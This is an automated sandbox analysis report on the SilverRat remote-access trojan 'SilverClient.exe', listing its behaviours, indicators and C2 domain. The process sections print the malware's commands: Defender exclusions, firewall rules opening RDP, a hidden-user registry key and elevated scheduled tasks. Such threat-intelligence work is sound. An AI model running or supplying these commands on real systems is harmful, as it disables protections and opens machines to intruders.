Malware Analysis Report

2025-03-15 01:12

Sample ID 250223-thcj6asqfr
Target SilverClient.exe
SHA256 319fb56f8db50bcf490d25f374acf3d7199e66ec1a8d192a97eb5ca7e767bd6b
Tags
silverrat defense_evasion execution persistence privilege_escalation trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

319fb56f8db50bcf490d25f374acf3d7199e66ec1a8d192a97eb5ca7e767bd6b

Threat Level: Known bad

The file SilverClient.exe was found to be: Known bad.

Malicious Activity Summary

silverrat defense_evasion execution persistence privilege_escalation trojan

Silverrat family

SilverRat

Command and Scripting Interpreter: PowerShell

Modifies Windows Firewall

Checks computer location settings

Modifies WinLogon

Command and Scripting Interpreter: PowerShell

Hide Artifacts: Hidden Users

Unsigned PE

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Scheduled Task/Job: Scheduled Task

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-02-23 16:03

Signatures

Silverrat family

silverrat

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-02-23 16:03

Reported

2025-02-23 16:05

Platform

win7-20240903-en

Max time kernel

119s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SilverClient.exe"

Signatures

SilverRat

trojan silverrat

Silverrat family

silverrat

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Modifies WinLogon

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\Users\Admin\AppData\Local\Temp\SilverClient.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\Users\Admin\AppData\Local\Temp\SilverClient.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Durios = "0" C:\Users\Admin\AppData\Local\Temp\SilverClient.exe N/A

Hide Artifacts: Hidden Users

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Durios = "0" C:\Users\Admin\AppData\Local\Temp\SilverClient.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2896 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe C:\Windows\system32\schtasks.exe
PID 2896 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe C:\Windows\system32\schtasks.exe
PID 2896 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe C:\Windows\system32\schtasks.exe
PID 2896 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe C:\Windows\system32\schtasks.exe
PID 2896 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe C:\Windows\system32\schtasks.exe
PID 2896 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe C:\Windows\system32\schtasks.exe
PID 2896 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe C:\Windows\system32\schtasks.exe
PID 2896 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe C:\Windows\system32\schtasks.exe
PID 2896 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe C:\Windows\system32\schtasks.exe
PID 2896 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2896 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2896 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2896 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe C:\Windows\System32\schtasks.exe
PID 2896 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe C:\Windows\System32\schtasks.exe
PID 2896 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe C:\Windows\System32\schtasks.exe
PID 2896 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe C:\Windows\System32\cmd.exe
PID 2896 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe C:\Windows\System32\cmd.exe
PID 2896 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe C:\Windows\System32\cmd.exe
PID 2896 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe C:\Windows\System32\cmd.exe
PID 2896 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe C:\Windows\System32\cmd.exe
PID 2896 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe C:\Windows\System32\cmd.exe
PID 2896 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe C:\Windows\System32\cmd.exe
PID 2896 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe C:\Windows\System32\cmd.exe
PID 2896 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe C:\Windows\System32\cmd.exe
PID 1608 wrote to memory of 1748 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 1748 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 1748 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1088 wrote to memory of 924 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1088 wrote to memory of 924 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1088 wrote to memory of 924 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 868 wrote to memory of 2792 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 868 wrote to memory of 2792 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 868 wrote to memory of 2792 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\netsh.exe
PID 1748 wrote to memory of 444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\netsh.exe
PID 1748 wrote to memory of 444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\netsh.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\SilverClient.exe

"C:\Users\Admin\AppData\Local\Temp\SilverClient.exe"

C:\Windows\system32\schtasks.exe

"schtasks.exe" /query /TN SilverClient.exe

C:\Windows\system32\schtasks.exe

"schtasks.exe" /Create /SC ONCE /TN "SilverClient.exe" /TR "C:\Users\Admin\AppData\Local\Temp\SilverClient.exe \"\SilverClient.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST

C:\Windows\system32\schtasks.exe

"schtasks.exe" /query /TN SilverClient.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b powershell –ExecutionPolicy Bypass -WindowStyle Hidden -Command Enable-NetFirewallRule -DisplayGroup 'Remote Desktop' & exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b powershell –ExecutionPolicy Bypass -WindowStyle Hidden -Command netsh advfirewall firewall add rule name='allow RemoteDesktop' dir=in protocol=TCP localport=3389 action=allow & exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b powershell –ExecutionPolicy Bypass -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath %ProgramFiles%\RDP Wrapper & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell –ExecutionPolicy Bypass -WindowStyle Hidden -Command netsh advfirewall firewall add rule name='allow RemoteDesktop' dir=in protocol=TCP localport=3389 action=allow

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell –ExecutionPolicy Bypass -WindowStyle Hidden -Command Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell –ExecutionPolicy Bypass -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Program Files\RDP Wrapper

C:\Windows\system32\netsh.exe

"C:\Windows\system32\netsh.exe" advfirewall firewall add rule "name=allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow

Network

Country Destination Domain Proto
US 8.8.8.8:53 paul-nw.gl.at.ply.gg udp
US 147.185.221.25:51413 paul-nw.gl.at.ply.gg tcp
US 147.185.221.25:51413 paul-nw.gl.at.ply.gg tcp
US 147.185.221.25:51413 paul-nw.gl.at.ply.gg tcp
US 8.8.8.8:53 softwares500.000webhostapp.com udp
US 8.8.8.8:53 softwares500.000webhostapp.com udp

Files

memory/2896-0-0x000007FEF5583000-0x000007FEF5584000-memory.dmp

memory/2896-1-0x000000013FBE0000-0x000000013FBEE000-memory.dmp

memory/2896-2-0x000007FEF5580000-0x000007FEF5F6C000-memory.dmp

memory/2264-7-0x000000001B720000-0x000000001BA02000-memory.dmp

memory/2264-8-0x0000000002870000-0x0000000002878000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabAF64.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/2896-25-0x000007FEF5583000-0x000007FEF5584000-memory.dmp

memory/2896-26-0x000007FEF5580000-0x000007FEF5F6C000-memory.dmp

memory/2896-27-0x0000000000900000-0x0000000000910000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TarCF17.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/2896-46-0x0000000000990000-0x00000000009A0000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 0e90715f68b966caeabf1de7d3762d10
SHA1 421f3a92223715bac6a27e20e104130ec5c08f67
SHA256 26566369ea2ef1a537ea865d1b15c8307cb84e938aee93ac29a29d5fdd6453a4
SHA512 12f5718d7ae6bbb178d87d244fa175c5173bf9c5d319bb5b76caeccf8a5b758003c47bd79d775ac523459fbafdea1c917bc2fccd06ec35f0bbd22e6d5c19d3d8

memory/1748-71-0x0000000001D90000-0x0000000001D98000-memory.dmp

memory/1748-70-0x000000001B4B0000-0x000000001B792000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 360e757366851586d274e51f909933ac
SHA1 5f5a2c0e45ccf5b36e984dd0f7fde5fdcdcee076
SHA256 fd83b56009a0c1d5f95f3f3a6c0315fd0b06407ebaf7d275a29cd46cb0b4689b
SHA512 e0dba8b35d33790c199daed97ed0bf8cbe93cd76b84380a21ad09a206234fc1c20c89a04dad4cc9a3008209564d7add9d783351af1047c7b063301f7e48c931f

Analysis: behavioral2

Detonation Overview

Submitted

2025-02-23 16:03

Reported

2025-02-23 16:05

Platform

win10v2004-20250217-en

Max time kernel

96s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SilverClient.exe"

Signatures

SilverRat

trojan silverrat

Silverrat family

silverrat

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\SilverClient.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SilverClient.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\SilverClient.exe

"C:\Users\Admin\AppData\Local\Temp\SilverClient.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks.exe" /query /TN SilverClient.exe

C:\Windows\SYSTEM32\schtasks.exe

"schtasks.exe" /Create /SC ONCE /TN "SilverClient.exe" /TR "C:\Users\Admin\AppData\Local\Temp\SilverClient.exe \"\SilverClient.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST

C:\Windows\SYSTEM32\schtasks.exe

"schtasks.exe" /query /TN SilverClient.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00

Network

Country Destination Domain Proto
US 8.8.8.8:53 paul-nw.gl.at.ply.gg udp
US 147.185.221.25:51413 paul-nw.gl.at.ply.gg tcp

Files

memory/2092-0-0x00007FFFD06F3000-0x00007FFFD06F5000-memory.dmp

memory/2092-1-0x0000000000360000-0x000000000036E000-memory.dmp

memory/2092-2-0x00007FFFD06F0000-0x00007FFFD11B1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ah4cwzci.aq3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2224-8-0x000001F2CDE10000-0x000001F2CDE32000-memory.dmp

memory/2092-15-0x00007FFFD06F3000-0x00007FFFD06F5000-memory.dmp

memory/2092-16-0x00007FFFD06F0000-0x00007FFFD11B1000-memory.dmp